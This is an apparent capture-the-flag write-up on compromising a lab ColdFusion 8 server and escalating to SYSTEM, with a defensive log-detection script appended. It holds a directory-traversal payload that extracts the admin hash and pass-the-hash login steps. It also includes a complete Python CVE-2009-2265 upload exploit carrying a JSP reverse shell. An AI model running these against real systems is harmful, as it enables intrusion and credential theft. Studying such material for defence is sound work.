ENUMERATION
Nmap TCP full scan
nmap -A -p- -oN nmap_tcp_all.txt 10.10.10.11
The nmap output highlighted the presence of:
- fmtp? on port 8500
- msrpc (Microsoft Windows RPC) on ports 135 and 49154
The first thing I tried was browsing to http://10.10.10.11:8500, but it was taking too long, so I thought no web server was running on the target 🙃.
Until then I had never heard of fmtp, so I searched for it to gain more information about the unusual service. From Eurocontrol:
Flight Message Transfer Protocol (FMTP) is a communication stack based on the transmission control and internet protocols (TCP/IP). It is used in a peer-to-peer communication context for the information exchange between flight data processing systems for the purpose of notification, coordination and transfer of flights between air traffic control units and for the purposes of civil-military cooperation.
The next step was to look for vulnerabilities in this protocol. The results didn't seem helpful at all. The last resort was trying a null session login with rpcclient. It was another bust.
As a reminder about the meaning of ?, from the nmap website:
The question mark tells us that Nmap was not even able to determine the service name through probing. As a fallback, rndc is mentioned because that has port 953 registered in nmap-services.
That means that fmtp was just a guess. I decided to open a tab, enter http://10.10.10.11:8500 again as the URL and wait, while I re-ran the port scans to be sure that no ports were missed the first time... a web server hosting ColdFusion was running on the target 😬.
Since I had already faced ColdFusion in another lab, I knew the /CFIDE/ directory was related to it and that in some versions you can extract the admin hash using Local File Inclusion. The plan was: get the hash, log in as admin, look for authenticated RCE.
Browsing to http://10.10.10.11:8500/CFIDE/administrator/ indicated the installed version: ColdFusion 8.
EXPLOITATION
searchsploit highlighted that several vulnerabilities exist for this framework.
Many of them, however, are XSS issues or affect other ColdFusion versions. I filtered them out with:
searchsploit coldfusion 8 | grep -v -e Cross -e Allaire -e Database -e BlazeDS -e Credential -e Development
The list of potential candidates was:
1. Adobe ColdFusion - Directory Traversal
EDB-ID: 14641
The exploit tries to retrieve the admin hash by exploiting CVE-2010-2861. The payload is:
locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
EDB-ID: 16985 (msf)
Metasploit module which leverages CVE-2010-2861 to extract the admin hash and then reach RCE using a scheduled task.
2. Arbitrary File Upload
EDB-ID: 45979
A .txt which shows how to upload a shell by exploiting CVE-2018-15961. The vulnerable path is /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm.
EDB-ID: 16788 (msf)
Metasploit module which leverages CVE-2009-2265 to upload a payload. The upload path is:
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm
Directory traversal
I went down the path I had already used before: the administrator hash was retrieved using the payload indicated in EDB-ID: 14641.
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Identify the hash type
At this point two ways to use the hash were possible: crack the hash or pass the hash. To identify the hash type I usually use hashid, hash-identifier or the framework documentation, looking for the default configuration.
Both hashid and hash-identifier indicated that the hash was computed using SHA1 (which should be avoided, as reported by Schneier).
Crack the hash
The cleartext password was easily found using online rainbow tables: happyday.
In this scenario the password was simple, already cracked and available on the web. Let's suppose the password was complex and you couldn't crack it. There is another way to gain admin access to ColdFusion, leveraging the Pass The Hash technique: you don't need the cleartext password, you can reuse the extracted hash.
Pass The Hash
If you read the source code of the /CFIDE/administrator login page, on POST the admin password value is computed as the HMAC of the salt and the SHA1 of the password: the salt is passed as the key and the password SHA1 as the data.
About every 30 seconds the salt changes; in fact, as shown below, if you wait a while the value of the hidden field is different every time.
Since we could retrieve the password SHA1, it was possible to reuse the hash together with the salt. The goal was to quickly generate the following value and send it as the password:
cfadminPassword.value = hmac(current_salt, admin_SHA1_LFI)
Steps:
1. Open Burp.
2. Enter the extracted admin hash in the password field.
3. Run javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value) in the browser console to generate the salted hash.
4. Copy the newly generated hash.
5. Set intercept on, click the login button and modify the intercepted request, replacing the cfadminPassword value with the new one. Forward the request.
6. You are now logged in as admin.
RCE
It was time to upload a webshell. Kali already ships a .cfm (ColdFusion Markup) version.
Since we needed to write the webshell to a file, the Directory Path mapped to the /CFIDE Logical Path was recorded, in order to be able to reach the webshell from the browser:
C:\ColdFusion8\wwwroot\CFIDE\
A new scheduled task was created as follows:
The task was triggered by clicking on the green icon.
The shell was reachable at http://10.10.10.11:8500/CFIDE/shell.cfm.
Running just whoami didn't work.
Another failed attempt, this time with the absolute path of cmd.
Even with output redirection I couldn't see any output 😐.
Pinging my system was working, though.
I also unsuccessfully tried both certutil to download nc.exe and powershell.exe to download and execute a reverse shell payload.
Server header
The server responses included the Server: JRun Web Server header.
From the JRun and ColdFusion docs, the JRun server seems to also serve JSP files.
So the next step was using a .jsp reverse shell instead of a .cfm webshell.
Triggering the reverse shell was really annoying because I had to try several times before it worked. Most of the time I got a Connection Timeout error. Finally it worked.
PRIVILEGE ESCALATION
JuicyPotato
whoami /priv indicated it was time for our beloved JuicyPotato.
Remember to also transfer nc if you want to launch a reverse shell.
systeminfo
No patch was applied on this box, so kernel exploits could be a potential PE vector.
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
MS10-059 aka Chimichurri
Among the exploits suggested by windows-exploit-suggester, this one worked.
MS10-092 (msf)
The privilege escalation was also possible using this Metasploit module, as shown by ippsec:
exploit/windows/local/ms10_092_schelevator
EXTRA
Since the arbitrary file upload exploit through FCKeditor didn't seem complex, as an exercise I tried to write a Python version of it. The exploit uploads a .jsp reverse shell.
Usage
1. Start a listener.
2. Run the exploit.
3. Browse to the reverse shell payload location.
4. Receive the reverse shell.
POC
#!/usr/bin/python3
import requests
import sys
import string
import random
import urllib.parse
# Title: FCKeditor 'CurrentFolder' Parameter Arbitrary File Upload Vulnerability
# Tested on: ColdFusion 8
# CVE: 2009-2265
# Description: this exploit uploads a .jsp reverse shell leveraging FCKeditor.
if len(sys.argv) != 5:
    print('Usage: exploit.py <LHOST> <LPORT> <TARGET> <RPORT>')
    print('Example: exploit.py 10.10.10.10 445 http://10.10.10.11 8500')
    sys.exit(1)
lhost = sys.argv[1]
lport = sys.argv[2]
target = sys.argv[3]
rport = sys.argv[4]
# JSP reverse shell: connects back to LHOST:LPORT and pipes a shell over the socket.
payload = """
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread{
    InputStream dj;
    OutputStream cr;
    StreamConnector( InputStream dj, OutputStream cr )
    {
        this.dj = dj;
        this.cr = cr;
    }
    public void run()
    {
        BufferedReader zf = null;
        BufferedWriter qhx = null;
        try
        {
            zf = new BufferedReader( new InputStreamReader( this.dj ) );
            qhx = new BufferedWriter( new OutputStreamWriter( this.cr ) );
            char buffer[] = new char[8192];
            int length;
            while( ( length = zf.read( buffer, 0, buffer.length ) ) > 0 )
            {
                qhx.write( buffer, 0, length );
                qhx.flush();
            }
        } catch( Exception e ){}
        try
        {
            if( zf != null )
                zf.close();
            if( qhx != null )
                qhx.close();
        } catch( Exception e ){}
    }
}
try
{
    String ShellPath;
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
        ShellPath = new String("/bin/sh");
    } else {
        ShellPath = new String("cmd.exe");
    }
    Socket socket = new Socket( "LHOST_HERE", LPORT_HERE );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
"""
payload = payload.replace("LHOST_HERE", lhost)
payload = payload.replace("LPORT_HERE", lport)
# Random names for the uploaded shell and for the decoy .txt filename.
shell_name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
fake_filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
upload_uri = target + ':' + rport + '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'
files = {'newfile': (fake_filename + '.txt', payload, 'application/x-java-archive')}
# The null byte in CurrentFolder truncates the name, so the .txt upload is stored as <shell_name>.jsp.
params = {'Command': 'FileUpload', 'CurrentFolder': '/' + shell_name + '.jsp%00', 'Type': 'File'}
# safe='%' keeps %00 as-is instead of double-encoding it to %2500.
params_str = urllib.parse.urlencode(params, safe='%')
r = requests.post(upload_uri, params=params_str, files=files)
print('Reverse shell location:')
print(target + ':' + rport + '/CFIDE/usersfile/file/' + shell_name + '.jsp')
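A defender's counterpart to the request patterns this writeup walks through (the enter.cfm locale traversal, the FCKeditor and CKEditor upload.cfm uploads, and the script later served from /CFIDE/usersfile/). This is an added example, not code from the original post: it runs a few detection rules over constructed access-log lines in common log format; the log lines, IP addresses and label names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not taken from the original writeup.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2020:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1234
10.10.14.5 - - [01/Jan/2020:10:01:00 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&CurrentFolder=/X7Q2ABCDE1.jsp%00&Type=File HTTP/1.1" 200 88
10.10.14.5 - - [01/Jan/2020:10:02:00 +0000] "GET /CFIDE/usersfile/file/X7Q2ABCDE1.jsp HTTP/1.1" 200 12
192.168.1.7 - - [01/Jan/2020:10:03:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4567
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Upload endpoints named in the writeup: FCKeditor connector (CVE-2009-2265) and CKEditor file manager (CVE-2018-15961).
UPLOAD_ENDPOINTS = (
    '/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm',
    '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm',
)

def classify(method: str, target: str) -> list[str]:
    """Return the detection labels that apply to one request (empty list = nothing suspicious)."""
    decoded = unquote(target)                  # %00 -> NUL, %2e%2e -> .., so encoded variants are caught too
    path, _, query = decoded.partition('?')
    path_l = path.lower()
    labels = []
    if '\x00' in decoded:
        labels.append('null-byte-truncation')
    if path_l.endswith('/cfide/administrator/enter.cfm') and 'locale=' in query and ('../' in query or '..\\' in query):
        labels.append('cve-2010-2861-locale-traversal')
    if method == 'POST' and path_l in UPLOAD_ENDPOINTS:
        labels.append('unauthenticated-filemanager-upload')
    if path_l.startswith('/cfide/usersfile/') and path_l.endswith(('.jsp', '.cfm')):
        labels.append('script-served-from-upload-dir')
    return labels

def scan_log(text: str) -> list[dict]:
    """Parse each line and return one finding per line that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                           # skip lines that are not in the expected format
        labels = classify(m['method'], m['target'])
        if labels:
            findings.append({'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']), 'labels': labels})
    return findings

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} {','.join(f['labels'])}")
```

The benign locale=en request on the last sample line produces no finding, while a 200 status on a traversal or upload line is the strongest signal that the request actually succeeded.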
ColdFusion Useful Resources
LESSONS LEARNED
- Don't rush... sometimes you need to wait.
- service? in nmap output means that the scan wasn't able to determine the service.
- grep OR: grep -e pattern1 -e pattern2 filename
- hashid and hash-identifier can help to identify a hash type.
- Crack the hash or pass the hash.
- Server response headers can give helpful information.
- ColdFusion 8 interesting CVEs: CVE-2010-2861, CVE-2018-15961, CVE-2009-2265.